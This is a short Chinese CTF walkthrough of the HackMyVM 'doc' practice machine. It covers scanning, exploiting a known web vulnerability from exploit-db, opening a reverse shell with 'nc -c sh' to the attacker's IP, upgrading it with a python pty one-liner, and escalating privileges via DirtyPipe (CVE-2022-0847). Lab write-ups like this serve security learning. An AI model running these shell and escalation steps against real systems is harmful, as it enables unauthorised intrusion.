hackmyvm系列12——doc
2022-5-29 12:58:36 Author: www.freebuf.com(查看原文) 阅读量:12 收藏

freeBuf

主站

分类

漏洞 工具 极客 Web安全 系统安全 网络安全 无线安全 设备/客户端安全 数据安全 安全管理 企业安全 工控安全

特色

头条 人物志 活动 视频 观点 招聘 报告 资讯 区块链安全 标准与合规 容器安全 公开课

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序

FreeBuf+小程序

前言:

只要活着,不管多痛苦,都会有好事发生。

*本次文章只用于技术讨论,学习,切勿用于非法用途,用于非法用途与本人无关!所有环境均为在线下载的靶场,且在本机进行学习。

一、信息收集

nmap -sV -Pn -sC -A 192.168.56.185 -p 0-65535

访问主页

http://192.168.56.185/

1653727208_6291dfe84724f74ff9fb2.png!small?1653727206643

点击登录,发现一个域名,将其加入到hosts文件中

doc.hmv

vim /etc/hosts

二、反弹shell

http://doc.hmv/

1653727382_6291e0965446280234e7b.png!small?1653727384636

在百度上对其进行搜索,搜索到一个历史漏洞

https://www.exploit-db.com/exploits/50221

利用exp进行反弹shell操作

nc -c sh 192.168.56.105 6666

获得稳定的shell:

python3 -c "import pty;pty.spawn('/bin/bash');"

三、权限提升

上传exp检测脚本

1653743778_629220a245b60a7f51fdf.png!small?1653743779341

采用[CVE-2022-0847] DirtyPipe

上传exp进行编译提权,但是在gcc的时候报错

后面将其加入环境变量就好了

export PATH=$PATH:/usr/bin/ld

运行即可


文章来源: https://www.freebuf.com/articles/web/334611.html
如有侵权请联系:admin#unsafe.sh